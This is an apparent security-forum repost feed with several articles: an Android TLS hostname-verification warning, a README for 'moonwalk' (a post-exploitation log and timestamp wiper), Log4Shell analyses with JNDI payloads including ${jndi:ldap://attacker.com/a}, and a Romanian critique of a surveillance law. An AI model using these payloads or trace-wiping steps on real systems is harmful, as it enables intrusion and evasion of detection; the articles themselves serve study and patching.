    Another way TLS certificate checking can be made insecure is if the host name verification process is skipped. In this case, the certificate validation process is not fully disabled like in the previous case. In fact, any certificate that was issued by an untrusted certificate authority will be rejected.

    However, there is another crucial step when validating a certificate: Not only does the certificate have to be signed by a trusted CA, it also needs to be issued specifically for use with the exact URL that is currently being accessed. If this step is skipped, a malicious actor can use their legitimately received certificate for “malicious.com” to pretend they are actually “google.com”. There should never be any need to do so, but a common way of turning off the host name verification is shown in the snippet below:

    val url = URL("https://wrong.host.badssl.com")
    val conn = url.openConnection() as HttpsURLConnection
    
    // Create HostnameVerifier that accepts everything
    conn.hostnameVerifier = HostnameVerifier { hostname, session -> true }

    As shown in the video below, when a website is visited whose TLS certificate has not been issued for the target host name, the above configuration still establishes a connection without any warnings or exceptions. If you try connecting to https://wrong.host.badssl.com using your own browser, you will see that the connection is refused exactly because the host name verification failed (e.g. in Google Chrome, this is called ERR_CERT_COMMON_NAME_INVALID).

    insecure-hostnameverifier

    Avoiding Vulnerabilities in Network-Facing Android Apps

    When your app needs to communicate with a backend server, you should always use encrypted and authenticated channels like TLS in order to protect your users from eavesdropping and manipulation of traffic. It is best practice to use well-established procedures and libraries instead of custom implementations in IT security to minimize the risk of security issues. That’s why it’s safer to use well-known TLS libraries, and leverage generally trusted certificate authorities.

    Using custom certificate authorities should be avoided as much as possible. They should only be used as a last resort in your security infrastructure, since using them makes the certificate verification process more error-prone. When you try to force Android to accept your custom certificates and establish a connection to the server, several things can go wrong.

    For example, implementation errors could include skipping parts of the required certificate checking process or using workarounds for runtime exceptions by disabling certificate checks completely. This can allow attackers to intercept the encrypted traffic without the user noticing, as we have seen in the examples above.

    But if using a custom certificate is the only option you have, your main focus should not be to establish the connection at any cost. Instead, you should focus on enforcing strict verification of the chain of trust. Avoiding crashes due to SSLExceptions by simply skipping all certificate checks is a very dangerous approach.

    We hope that our findings and hands-on examples helped increase awareness for the need for secure TLS certificate checking implementations. If you are curious about properly making your Android app connect to servers using certificates by custom certificate authorities, then make sure to check out our upcoming blog post.

     

    Sursa: https://www.guardsquare.com/blog/insecure-tls-certificate-checking-in-android-apps

  11. moonwalk

    Cover your tracks during Linux Exploitation / Penetration Testing by leaving zero traces on system logs and filesystem timestamps.

    146671442-78bb6781-b283-4f43-8754-d1d3b62ae627.gif 146671305-5ffc26b4-1e0e-4436-9a1e-1e0dfc81f40e.gif

    📖 Table of Contents

    ℹ️ Introduction

    moonwalk is a 400 KB single-binary executable that can clear your traces while penetration testing a Unix machine. It saves the state of system logs pre-exploitation and reverts that state including the filesystem timestamps post-exploitation leaving zero traces of a ghost in the shell.

    ⚠️ NOTE: This tool is open-sourced to assist solely in Red Team operations and in no means is the author liable for repercussions caused by any prohibited use of this tool. Only make use of this in a machine you have permission to test.

    Features

    • Small Executable: Get started quickly with a curl fetch to your target machine.
    • Fast: Performs all session commands including logging, trace clearing, and filesystem operations in under 5 milliseconds.
    • Reconnaissance: To save the state of system logs, moonwalk finds a world-writable path and saves the session under a dot directory which is removed upon ending the session.
    • Shell History: Instead of clearing the whole history file, moonwalk reverts it back to how it was including the invokation of moonwalk.
    • Filesystem Timestamps: Hide from the Blue Team by reverting the access/modify timestamps of files back to how it was using the GET command.

    Installation

    $ curl -L https://github.com/mufeedvh/moonwalk/releases/download/v1.0.0/moonwalk_linux -o moonwalk
    

    (AMD x86-64)

    OR

    Download the executable from Releases OR Install with cargo:

    $ cargo install --git https://github.com/mufeedvh/moonwalk.git
    

    Install Rust/Cargo

    Build From Source

    Prerequisites:

    • Git
    • Rust
    • Cargo (Automatically installed when installing Rust)
    • A C linker (Only for Linux, generally comes pre-installed)
    $ git clone https://github.com/mufeedvh/moonwalk.git
    $ cd moonwalk/
    $ cargo build --release
    

    The first command clones this repository into your local machine and the last two commands enters the directory and builds the source in release mode.

    Usage

    146672354-9db1e7e5-bb8a-43e5-8b64-b2d1bbea547e.png

    Once you get a shell into the target Unix machine, start a moonwalk session by running this command:

    $ moonwalk start
    

    While you're doing recon/exploitation and messing with any files, get the touch timestamp command of a file beforehand to revert it back after you've accessed/modified it:

    $ moonwalk get ~/.bash_history
    

    Post-exploitation, clear your traces and close the session with this command:

    $ moonwalk finish
    

    That's it!

    Contribution

    Ways to contribute:

    • Suggest a feature
    • Report a bug
    • Fix something and open a pull request
    • Help me document the code
    • Spread the word
    • Find something I missed which leaves any trace!

    License

    Licensed under the MIT License, see LICENSE for more information.

    Liked the project?

    Support the author by buying him a coffee!

    Buy Me A Coffee


    Support this project by starring , sharing 📲, and contributing 👩‍💻❤️

     

    Sursa: https://github.com/mufeedvh/moonwalk

    • Upvote 2
  12.  

    For decades, the Windows kernel pool remained the same, using simple structures that were easy to read, parse and search for, but recently this all changed, with a new and complex design that breaks assumptions and exploits, and of course, tools and debugger extensions... But could this open up a whole new attack surface as well? By: Yarden Shafir Full Abstract & Presentation Materials: https://www.blackhat.com/us-21/briefings/schedule/#windows-heap-backed-pool-the-good-the-bad-and-the-encoded-23482

  13. Ghidra 10.1

     Latest
     
    @ghidra1 ghidra1 released this 3 hours ago
    · 53 commits to master since this release
     
     
    • Upvote 3
  14. Speed through the log4j2 JNDI injection vulnerability~

     

    Word count: 1.5k Reading time: 6 min
    2021/12/10 932 Share

    On December 9, 2021, a disaster comparable to eternal blue swept through Java. Log4j2 broke the JNDI injection vulnerability with extremely low difficulty to exploit. The difficulty of exploiting the vulnerability is breathtakingly low, and it is basically comparable to S2.

    Unlike S2, Log4j2 is used by a large number of Java frameworks and applications as the basic third-party library for logging. As long as Log4j2 is used for log output and the log content can be partially controlled by the attacker, it may be vulnerable to attacks. Influence. Therefore, the vulnerability also affects a large number of common applications and components around the world, such as:
    Apache Struts2
    Apache Solr
    Apache Druid
    Apache Flink
    Apache Flume
    Apache Dubbo
    Apache Kafka
    Spring-boot-starter-log4j2
    ElasticSearch
    Redis
    Logstash

    Let's take a look at the vulnerability principle

    Vulnerability analysis

    Set up the environment

    Here choose log4j-core 2.14.1 version, simply construct an environment

    1 
    2 
    3 
    4 
    5 
    6 
    7 
    8 
    9 
    10 
    11 
    12 
    13
    
    package top.bigking.log4j2attack.service;
    
    
    import lombok. extern .slf4j.Slf4j;
    
    @Slf4j 
    public  class  HelloService { public static void main ( String [] args) 
    {         
    System.setProperty( "com.sun.jndi.rmi.object.trustURLCodebase" , "true" );         
    System.setProperty( "com.sun.jndi .ldap.object.trustURLCodebase" , "true" ); 
    log .error( "${jndi:rmi://127.0.0.1:1099/ruwsfb}" );     } }
            
    
    
            
    
    
    

    spring-boot needs to turn off the original log and add log4j (this is a common usage)

    1 
    2 
    3 
    4 
    5 
    6 
    7 
    8 
    9 
    10 
    11 
    12 
    13 
    14 
    15
    
    < dependency > < groupId > org.springframework.boot </ groupId > < artifactId > 
    spring-boot-starter </ artifactId > < exclusions > 
    <!-- Remove springboot default configuration--> < exclusion > 
    < groupId > org.springframework .boot </ groupId > < artifactId > 
    spring-boot-starter-logging </ artifactId > </ exclusion > </ exclusions > </
        
        
        
            
                
                
            
        
    dependency >
    
    < dependency >  <!-- Introduce log4j2 dependency--> < groupId > org.springframework.boot </ groupId > 
    < artifactId > spring-boot-starter-log4j2 </ artifactId > </ dependency >
        
        
    
    

    Execute to trigger
    20211210173223.png

    Code analysis

    Causes of Vulnerability

    Here we follow the error normally
    20211210173341.png

    First of all, you can see isEnabledthe verification here . This is also the reason why many friends' info functions cannot be triggered. If the configuration is not met, the log will not be recorded.

    MessagePatternConverterThe formatfunction followed all the way here
    20211210173351.png

    You can see the entrance of this vulnerability, if the code exists, ${it will enter additional processing. Continue to follow to StrSubstitutorthe substitutefunction
    20211210173359.png

    Here is the main part of the vulnerability, basically the grammatical content in the recursive processing, and some built-in grammar

    prefixMatcherYes ${
    suffixMatcherYes}

    Only when the two parts are searched will it enter the grammar processing
    20211210173409.png

    The content between the brackets is passed to varname

    And carry out two built-in grammars, of which

    1 
    2 
    3 
    4
    
    public  static  Final  String DEFAULT_VALUE_DELIMITER_STRING = ": -" ; 
    public  static  Final StrMatcher DEFAULT_VALUE_DELIMITER = StrMatcher.stringMatcher ( ": -" ); 
    public  static  Final  String ESCAPE_DELIMITER_STRING = ": \\ -" ; 
    public  static  Final StrMatcher DEFAULT_VALUE_ESCAPE_DELIMITER StrMatcher.stringMatcher = ( ":\\-" );
    

    20211210173420.png

    If these two grammars are matched, varname will be modified to the corresponding part of the corresponding grammar (important bypass)

    The processed variable will enter the resolveVariablefunction on line 418
    20211210173431.png

    And resolveVariablehere, enter the corresponding lookup directly according to different protocols, which jndi.lookupwill cause loopholes
    20211210173439.png

    If the execution of the lookup returns, it will enter the next level of recursive processing on line 427
    20211210173446.png

    There are also many protocols supported by lookup
    20211210173452.png

    include{date, java, marker, ctx, lower, upper, jndi, main, jvmrunargs, sys, env, log4j}

    If you can smoothly step down from this process, it is not difficult to find that there are actually many logical problems in the entire process.

    Some simple bypasses

    Previously, we ${jndi:rmi://127.0.0.1:1099/ruwsfb}analyzed and processed according to the payload .

    But in the code, there are many parts that explain that there is recursive processing here, that is to say, we can ${}handle the return here in a nested syntax.

    For example, we select the lower protocol to return and splicing into the code
    20211210173459.png

    The same can be executed

    Including his built-in special grammar
    20211210173505.png

    The first half will be treated as varname, and the second half will be returned to replace the original result for the next splicing, so that a new payload can be constructed.

    Even the official has added a fault-tolerant code to it, if characters that do not meet the conditions are encountered, they will be deleted directly.
    20211210173511.png

    Due to some special regulations, I will not announce the relevant bypass payload here. If you understand this part of the code, you can easily construct it.

    2.15.0 rc1 fix

    In fact, this vulnerability was released a few days ago with an update patch, and I have also paid attention to it before, but I did not expect the logic of exploitation to be so simple.

    When the entire loophole caused a storm in the entire security circle, more and more friends focused their attention here. The rc1 repair also ushered in a bypass. The bypass here is actually quite interesting. Let's take a look at the patch.

    Repair patches and test samples are very interesting
    20211210173517.png

    To put it simply, the original repair logic processing office, think of a way to make him deal with the error, then the original catch will not do the processing, but go directly into the lookup
    20211210173524.png

    😆

    Repair plan

    1. At present, Apache officially only released 2.15.0 rc2 and packaged the 2.15.0 release. There is no guarantee that it will not be bypassed a second time, and it is said that this version is not very compatible.
    https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2

    2. Now the common repair plan mainly focuses on configuration modification
    , adding configuration to the log4j2.component.properties configuration file of the project:

    1
    
    log4j2.formatMsgNoLookups = true
    

    It should be noted that this configuration only takes effect above 2.10.0.

    You can also add this configuration in the java startup item

    1
    
    -Dlog4j2.formatMsgNoLookups = true
    

    3. In addition, you may have to rely on major WAFs

    Write at the end

    In fact, this vulnerability was patched on December 6, and it was widely spread on Twitter. The first reaction I saw at first was that it was impossible to have such a serious problem. It must be a lot of restrictions. As a result, the use is simply very simple, and it swept all the projects in the java class at once.

    As a basic component, this component is referenced by most java frameworks/java applications, and a large number of problems are exposed at once. Just 1 hour after get off work, the payload has been spread. If it weren’t for the use of jndi to rce, it’s not easy. It is estimated that many services have fallen overnight.

    Since the manufacturer has not had time to release the repaired release, this vulnerability can only be defended by waf in the early stage. If the manufacturer with poor security operation construction, it is estimated that they can only wait to die. This feeling may be difficult to feel without experiencing such a big hole. . (When will 360 rise?

    • Thanks 1
  15. Log4Shell: RCE 0-day exploit found in log4j2, a popular Java logging package

    December 9, 2021 · 7 min read
    Free Wortley
    CEO at LunaSec
    Chris Thompson
    Developer at Lunasec

    Log4Shell Logo

    Updated @ December 10th, 10am PST

    A few hours ago, a 0-day exploit in the popular Java logging library log4j2 was discovered that results in Remote Code Execution (RCE) by logging a certain string.

    Given how ubiquitous this library is, the impact of the exploit (full server control), and how easy it is to exploit, the impact of this vulnerability is quite severe. We're calling it "Log4Shell" for short.

    The 0-day was tweeted along with a POC posted on GitHub. Since this vulnerability is still very new, there isn't a CVE to track it yet. This has been published as CVE-2021-44228.

    This post provides resources to help you understand the vulnerability and how to mitigate it for yourself.

    Who is impacted?

    Many, many services are vulnerable to this exploit. Cloud services like Steam, Apple iCloud, and apps like Minecraft have already been found to be vulnerable.

    Anybody using Apache Struts is likely vulnerable. We've seen similar vulnerabilities exploited before in breaches like the 2017 Equifax data breach.

    Many Open Source projects like the Minecraft server, Paper, have already begun patching their usage of log4j2.

    Simply changing an iPhone's name has been shown to trigger the vulnerability in Apple's servers.

    Updates (3 hours after posting): According to this blog post (see translation), JDK versions greater than 6u211, 7u201, 8u191, and 11.0.1 are not affected by the LDAP attack vector. In these versions com.sun.jndi.ldap.object.trustURLCodebase is set to false meaning JNDI cannot load remote code using LDAP.

    However, there are other attack vectors targeting this vulnerability which can result in RCE. An attacker could still leverage existing code on the server to execute a payload. An attack targeting the class org.apache.naming.factory.BeanFactory, present on Apache Tomcat servers, is discussed in this blog post.

    Affected Apache log4j2 Versions

    2.0 <= Apache log4j <= 2.14.1

    Permanent Mitigation

    Version 2.15.0 of log4j has been released without the vulnerability. log4j-core.jar is available on Maven Central here, with [release notes] and [log4j security announcements].

    The release can also be downloaded from the Apache Log4j Download page.

    Temporary Mitigation

    As per this discussion on HackerNews:

    The 'formatMsgNoLookups' property was added in version 2.10.0, per the JIRA Issue LOG4J2-2109 [1] that proposed it. Therefore the 'formatMsgNoLookups=true' mitigation strategy is available in version 2.10.0 and higher, but is no longer necessary with version 2.15.0, because it then becomes the default behavior [2][3].

    If you are using a version older than 2.10.0 and cannot upgrade, your mitigation choices are:

    • Modify every logging pattern layout to say %m{nolookups} instead of %m in your logging config files, see details at https://issues.apache.org/jira/browse/LOG4J2-2109 or,

    • Substitute a non-vulnerable or empty implementation of the class org.apache.logging.log4j.core.lookup.JndiLookup, in a way that your classloader uses your replacement instead of the vulnerable version of the class. Refer to your application's or stack's classloading documentation to understand this behavior.

    How the exploit works

    Exploit Requirements

    • A server with a vulnerable log4j version (listed above),
    • an endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send the exploit string,
    • and a log statement that logs out the string from that request.

    Example Vulnerable Code

    import org.apache.logging.log4j.LogManager;
    import org.apache.logging.log4j.Logger;
    
    import java.io.*;
    import java.sql.SQLException;
    import java.util.*;
    
    public class VulnerableLog4jExampleHandler implements HttpHandler {
    
      static Logger log = LogManager.getLogger(VulnerableLog4jExampleHandler.class.getName());
    
      /**
       * A simple HTTP endpoint that reads the request's User Agent and logs it back.
       * This is basically pseudo-code to explain the vulnerability, and not a full example.
       * @param he HTTP Request Object
       */
      public void handle(HttpExchange he) throws IOException {
        String userAgent = he.getRequestHeader("user-agent");
        
        // This line triggers the RCE by logging the attacker-controlled HTTP User Agent header.
        // The attacker can set their User-Agent header to: ${jndi:ldap://attacker.com/a}
        log.info("Request User Agent:{}", userAgent);
    
        String response = "<h1>Hello There, " + userAgent + "!</h1>";
        he.sendResponseHeaders(200, response.length());
        OutputStream os = he.getResponseBody();
        os.write(response.getBytes());
        os.close();
      }
    }
    
    Copy

    Reproducing Locally

    If you want to reproduce this vulnerability locally, you can refer to christophetd's vulnerable app.

    In a terminal run:

    docker run -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app
    
    Copy

    and in another:

    curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://127.0.0.1/a}'
    
    Copy

    the logs should include an error message indicating that a remote lookup was attempted but failed:

    2021-12-10 17:14:56,207 http-nio-8080-exec-1 WARN Error looking up JNDI resource [ldap://127.0.0.1/a]. javax.naming.CommunicationException: 127.0.0.1:389 [Root exception is java.net.ConnectException: Connection refused (Connection refused)]
    
    Copy

    Exploit Steps

    1. Data from the User gets sent to the server (via any protocol),
    2. The server logs the data in the request, containing the malicious payload: ${jndi:ldap://attacker.com/a} (where attacker.com is an attacker controlled server),
    3. The log4j vulnerability is triggered by this payload and the server makes a request to attacker.com via "Java Naming and Directory Interface" (JNDI),
    4. This response contains a path to a remote Java class file (ex. http://second-stage.attacker.com/Exploit.class) which is injected into the server process,
    5. This injected payload triggers a second stage, and allows an attacker to execute arbitrary code.

    Due to how common Java vulnerabilities such as these are, security researchers have created tools to easily exploit them. The marshalsec project is one of many that demonstrates generating an exploit payload that could be used for this vulnerability. You can refer to this malicious LDAP server for an example of exploitation.

    How to identify if your server is vulnerable.

    Using a DNS logger (such as dnslog.cn), you can generate a domain name and use this in your test payloads:

    curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://xxx.dnslog.cn/a}'
    
    Copy

    Refreshing the page will show DNS queries which identify hosts who have triggered the vulnerability.

    CAUTION

    While dnslog.cn has become popular for testing log4shell, we advise caution. When testing sensitive infrastructure, information sent to this site could be used by its owner to catalogue and later exploit it.

    If you wish to test more discretely, you may setup your own authoritative DNS server for testing.

    More information

    You can follow us on Twitter where we'll continue to update you as information about the impact of this exploit becomes available.

    For now, we're just publishing this to help raise awareness and get people patching it. Please tell any of your friends running Java software!

    Limit your vulnerability to future attacks

    LunaSec is an Open Source Data Security framework that isolates and protects sensitive data in web applications. It limits vulnerability to attacks like Log4Shell and can help protect against future 0-days, before they happen.

    Editing this post

    If you have any updates or edits you'd like to make, you can edit this post as Markdown on GitHub. And please throw us a Star !

    Links

    Edits

    1. Updated the "Who is impacted?" section to include mitigating factor based on JDK version, but also suggest other exploitation methods are still prevalent.
    2. Named the vulnerability "LogJam", added CVE, and added link to release tags.
    3. Update mitigation steps with newer information.
    4. Removed the name "LogJam" because it's already been used. Using "Log4Shell" instead.
    5. Update that 2.15.0 is released.
    6. Added the MS Paint logo[4], and updated example code to be slightly more clear (it's not string concatenation).
    7. Reported on iPhones being affected by the vulnerability, and included local reproduction code + steps.
    8. Update social info.
    9. Updated example code to use Log4j2 syntax.

    References

    [1] https://issues.apache.org/jira/browse/LOG4J2-2109

    [2] https://github.com/apache/logging-log4j2/pull/607/files

    [3] https://issues.apache.org/jira/browse/LOG4J2-3198

    [4] Kudos to @GossiTheDog for the MS Paint logo!

    Also kudos to @80vul for tweeting about this.

     

    Sursa: https://www.lunasec.io/docs/blog/log4j-zero-day/

    • Sad 1
    • Upvote 3
  16. Lărgirea interceptării comunicațiilor – introdusă pe șest de Guvern

    • Posted on: 9 December 2021
    •  
    • By: Bogdan Manolea

    Un nou articol (apărut din senin într-o lege care trebuia să reglementeze cu totul altceva) lărgește în mod nejustificat domeniul și spectrul interceptării comunicațiilor electronice, inclusiv a accesului la datele de trafic, date de conținut și la „conținutul comunicațiilor criptate tranzitate”.

    Articolul a fost adăugat într-un proiect de lege adoptat de Guvernul Câțu cu doar 3 zile înainte de a fi demis de Parlament, iar proiectul a trecut de Camera Deputaților fără niciun amendament contrar.

    I. Mega-plictis, ce să mai.

    Doar întâmplarea face că ne-am uitat pe un text juridico-tehnic lung de 300 de pagini pe un text relativ plictisitor, chiar și pentru juriști obișnuiți cu domeniul telecom.

    Proiectul de lege pentru transpunerea directivei UE 2018/1972 (Codul european al comunicațiilor), care de fapt înlocuiește alte 4 directive, este un mega-proiect legislativ care transpune măsuri în mare parte interesante doar pentru cei interesați de domeniul comunicațiilor electronice și de ce face ANCOM.

    Ministerul Transporturilor și Comunicațiilor a avut proiectul în dezbatere publica încă din noiembrie 2020 (inclusiv cu o întâlnire online) și a inclus în el și alte reglementari de interes pentru același domeniu (ceva clarificări legea infrastructurii, serviciul My ANCOM) și i-au mai dat și un nume generic - „Proiectul de Lege pentru modificarea și completarea unor acte normative în domeniul comunicațiilor electronice și pentru stabilirea unor măsuri de facilitare a dezvoltării rețelelor de comunicații electronice”. Mega-plictis, ce să mai.

    Deși directiva trebuia transpusă până pe 21 decembrie 2020, a zăcut undeva prin Guvern aproape un an până când a plecat USR din coaliție . Apoi, cu doar 3 zile înainte să fie demis (coincidență sau nu?!?), Guvernul Câțu îl adoptă dintr-o dată în ultima ședință de guvern. Pe urmă intră în circuitul parlamentar, iar la Camera Deputaților trece ca prin brânză și este adoptat pe 7 decembrie 2021. Mega-plictis, ce să mai.

    II. Și diavolul e în 10^2

    Doar ca între varianta din dezbatere publică și cea adoptată de guvern apare o nouă adăugire în motivație numită „Schimbări legislative relevante pentru domeniul securităţii naţionale” (sic!), două definiții (scrise evident de persoane care nu au lucrat în domeniu, după formulările absolut improprii) și art 102 inserat într-o zonă care n-are nimic de a face cu subiectul celorlalte 299 de pagini:

    Art.10^2. — (1) Furnizorii de servicii de găzduire electronică cu resurse IP şi furnizorii de servicii de comunicaţii interpersonale care nu se bazează pe numere au obligaţia să sprijine organele de aplicare a legii şi organele cu atribuţii în domeniul securităţii naţionale, în limitele competenţelor acestora, pentru punerea în executare a metodelor de supraveghere tehnică ori a actelor de autorizare dispuse în conformitate cu dispoziţiile Legii nr. 135/2010 privind Codul de procedură penală, cu modificările şi completările ulterioare, şi ale Legii nr. 51/1991 privind securitatea naţională, republicată, cu modificările şi completările ulterioare, respectiv:

    a) să permită interceptarea legală a comunicaţiilor, inclusiv să suporte costurile aferente;

    b) să acorde accesul la conţinutul comunicaţiilor criptate tranzitate în reţelele proprii;

    c) să furnizeze informaţiile reţinute sau stocate referitoare la date de trafic, date de identificare a abonaţilor sau clienţilor, modalităţi de plată şi istoricul accesărilor cu momentele de timp aferente;

    d) să permită, în cazul furnizorilor de servicii de găzduire electronică cu resurse IP, accesul la propriile sisteme informatice, în vederea copierii sau extragerii datelor existente.

    (2) Obligaţiile prevăzute la alin. (1) lit. a) - c) se aplică în mod corespunzător şi furnizorilor de reţele sau servicii de comunicaţii electronice.

     

    III. Cine sunt ăștia???

    Pentru cei pierduți în textul ce pare un acrostih dar nu este, sa explicăm trei termeni:

    „Furnizorii de servicii de găzduire electronică cu resurse IP” – sunt de fapt aceiași cu furnizorii de găzduire web (de fapt, deja reglementați în legea 365/2002), care oferă serviciile „pe teritoriul României” conform definiției nou inventate din art 4 alineatul (1), noul punct 9^5.

    „Serviciu de comunicații interpersonale care nu se bazează pe numere” – este ce se numea acum câțiva ani „mesagerie instatanee sau mesaje chat” și practic intra în categoria asta Skype, WhatsApp, Facebook Messanger, Signal, Wire, Telegram sau pentru cei mai nostalgici Yahoo Messanger, AIM, ICQ sau chiar IRC. Pentru o minte (sau altceva) mai creață, ar fi un serviciu de comunicații interpersonale care se integrează perfect în definiția imberbă din art 4 alineatul (1), noul punct 9^3 chiar și Chaturbate sau LiveJasmin. (ca să se clătească și ochiul lor, că să zic așa). Atenție, aceștia nu sunt doar cei care oferă serviciile „ pe teritoriul României”. (cuvânt cheie- indiciu: „tranzitat”)

    „Organele cu atribuţii în domeniul securităţii naţionale”- este aceiași terminologie vagă deja declarată neconstituțională în 2008 (și alte decizii). Oricum nimeni nu este în stare sa facă lista lor, cu atât mai mult cu privire la atribuțiile exacte, legea din 1991 find la fel de vagă și astăzi.

    IV. Ce trebuie să facă???

    Aspectele legate de interceptarea legală comunicațiilor, cu toate garanțiile de rigoare (ma rog, până la noi decizii de neconstituționalitate, eu zic ca decizia din 2016 e doar prima dintr-un șir dacă nu se rezolvă niște probleme de fond) sunt prevăzute de Codul de Procedură Penală (CPP). În mod logic, dacă ar fi vreo problemă sau este nevoie de actualizarea lor s-ar face tot printr-o modificare la acest cod. (indiciu: e o lege organică, greu de modificat).

    Doar că dincolo de a impune obligații similare și unor alte categorii furnizori (care oricum, nu au legătura cu ANCOM) pe unde se plimbă în 2021 conținutul și legal, și ilegal. (poate de discutat, dar atunci ar trebui în CPP și nu pe șest), textul lărgește mult spectrul de acțiuni de interceptări și acces, pe care CPP nu le prevede. Mă opresc doar la 2 aici:

    • „accesul la conţinutul comunicaţiilor criptate tranzitate în reţelele proprii;” nu există în CPP.

      Dincolo de faptul ca un furnizor (inclusiv cei de comunicații) ar trebui să își creeze un sistem de depistare a conținutului criptate tranzitat, eu cred că ținta sunt furnizorii care oferă astfel de servicii. Aici sunt 2 variante – fie vor conținutul decriptat direct de la furnizor sau pentru ca vor să spargă criptarea? (cât de legal, ilegal ar fi, este o altă discuție) , fie vor conținutul criptat pentru că vor să obțină/determine partea care are cheia de criptare să o dezvăluie cumva. Astea, ca și altele din același spectru ridică niște subiecte de privacy și security mult prea complexe pentru a le rezolva în 2 propoziții (dau însă 2 linkuri - Bugs in our Pockets: The Risks of Client-Side Scanning și un document leak-uit de la Comisie)

      Să nu mai zicem că textul Directivei de implementat zice exact pe dos – promovați criptarea, nu o subminați: „ar trebui promovată de exemplu utilizarea criptării, end-to-end dacă este cazul, și, dacă este necesar, criptarea ar trebui să fie obligatorie în conformitate cu principiile securității și protejării vieții private în mod implicit și din faza de proiectare”

    • „să permită, în cazul furnizorilor de servicii de găzduire (...) accesul la propriile sisteme informatice, în vederea copierii sau extragerii datelor existente.”nu există în CPP.

      O terminologie la fel de vagă ca cea din defuncta lege a securității cibernetice (declarata neconstituțională în 2015) face ca să ai practic acces la orice conținut de pe orice server din România în condiții total neclare. (asta e demnă de capabilitățile NSA) Vrei acces la documentația unui jurnalist? Nu accesezi redacția, ci serviciul de găzduire al redacției. Oricum presa era la amenințări de „securitate națională”, nu? Capisci?

    V. Deci: Încolonarea și înregistrarea

    Ca să poată probabil să justifice cumva integrarea în această lege, propunerea normativă mai și creează o obligație de înregistrare a acestor noi furnizori la ANCOM, ceea ce contrazice flagrant legislația europeană în domeniu (în principal directiva e-commerce, implementată la noi prin legea 365/2002). Dar ce mai contează o obligație europeana, când e în joc „securitatea națională”? Important e că le putem impune să își creeze, pe costuri proprii, infrastructura de interceptare și când vine o hârtie de la „organ” să dea tot.

    VI. Concluzie?

    Dincolo de orice discuție pe fond, a propune astfel de soluții legislative de interceptare a comunicațiilor pe ușa din dos, evitând orice dezbatere publică nu este doar profund nedemocratică, dar chiar jignitoare la adresa unui popor exact într-un moment în care ar trebui să fie convins de același stat că îi vrea binele prin măsurile propuse, nu că de fapt sunt niște cobai, inclusiv pentru unele măsuri de supraveghere „semnate ca primarul.”

    Sau cine știe poate se trezește Senatul, presa sau cetățenii să îi ia la niște întrebări – cine a propus, de fapt, textul? De ce acum? De ce aici? De ce acest text și nu altul? De ce nu în CPP? De ce nu s-a făcut vreo dezbatere publică?

     

    PS: Am atașat la articol un document unde am OCR-izat textele relevante strecurate după dezbaterea publică, pentru a nu vă obliga să căutați în peste 900 de pagini cu imagini exact unde sunt textele cu pricina...

     

    Sursa: https://apti.ro/largirea-interceptarii-comunicatiilor-electronice-impusa-pe-sest?

    • Sad 1
    • Upvote 5
×
×
  • Create New...